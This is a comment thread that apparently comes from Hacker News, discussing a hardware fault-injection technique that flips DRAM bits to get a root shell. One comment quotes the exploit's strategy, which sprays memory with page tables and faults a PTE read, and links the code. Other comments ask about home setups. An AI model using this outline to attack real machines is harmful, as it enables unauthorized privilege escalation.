Exploiting DRAM bitflips to get a root shell

mikewarot · 2024-10-05T16:01:56 1728144116

It's circuit bending, or Fritzing, not finding a clever exploit in DRAM. Even an ECC module isn't going to help you if it's on the CPU data bus.

I just hope we don't all end up suffering through yet another 50% slowdown in patches to the Kernel to avoid this nonsense because someone buys the BS and now it has to be "fixed", like the row hammer software fixes, instead of just fixing the dam DRAM modules, and better hardware.

</rant>

Another analogy:

It's like when a brain surgeon probes your cerebellum and suddenly you smell strawberry or hear Brahms. The surgeon certainly doesn't know what reaction you have unless you tell them.

You wouldn't go around later saying "Dr Jones made me smell strawberries, on a whim, certainly he's a G*d"

nwah1 · 2024-10-05T19:16:35 1728155795

If there is no unpredictable ASLR then in this case it is as if the surgeon knows exactly where to probe to make you smell strawberries.

saagarjha · 2024-10-07T00:34:30 1728261270

Your analogy isn't quite right. It's as if the doctor is capable of turning your entire brain into strawberry-sensing neurons, and then they poke it and 90% of the time you think about strawberries.

captn3m0 · 2024-10-05T17:33:44 1728149624

Some context from the author’s fedi account:

> I'm exploring this because I think it might be useful for console hacking - where you have physical access, and the ability to execute sandboxed code (say, inside a web browser)

ID: @retr0id@retr0.id (they ask not to link to their fedi instance).

sans_souse · 2024-10-05T11:07:51 1728126471

This is some low level hacking right here

backspace_ · 2024-10-05T11:53:06 1728129186

Do I need a lighter or the matrix soundtrack to accomplish this hack.

karmakaze · 2024-10-05T15:00:08 1728140408

Either.

[0] https://devblogs.microsoft.com/oldnewthing/20220816-00/?p=10...

dan_linder · 2024-10-05T13:41:44 1728135704

So if we don't have the addition of the antenna wire, is the usual case shielding sufficient or do we just need larger/intense pulses, more of them, or somewhere in between? is like to try this at home, but not if I have to solder a wire on the already small RAM traces.

yonatan8070 · 2024-10-05T14:05:29 1728137129

If you try it on a desktop system, the RAM is likely going to be in through-hole DIMM slots, so the soldering will be a lot more managable than in a laptop

wrs · 2024-10-05T19:13:49 1728155629

I’m not sure how you would limit the incoming interference to a single bit, unless you’re very good at beam forming antennas.

azalemeth · 2024-10-05T15:02:22 1728140542

Yet again, I wish we all had ECC ram!

Here's the code: https://github.com/DavidBuchanan314/dram_emfi/blob/main/linu... -- the basic idea is

> Hardware setup: This time I put the "antenna" wire on DQ25, which will fault 64-bit values to +/-32MiB

> Exploit strat: We fill up as much of physical memory as possible with page tables.

> When we fault a PTE read, we have a good chance of landing on a page table, giving us R/W access to a page table from userspace.

CTDOCodebases · 2024-10-05T14:05:11 1728137111

I remember kids using these things into Street Fighter II machines to get free credits.

ano-ther · 2024-10-05T12:00:53 1728129653

Impressive! And a music track like that should be standard for all progress bars.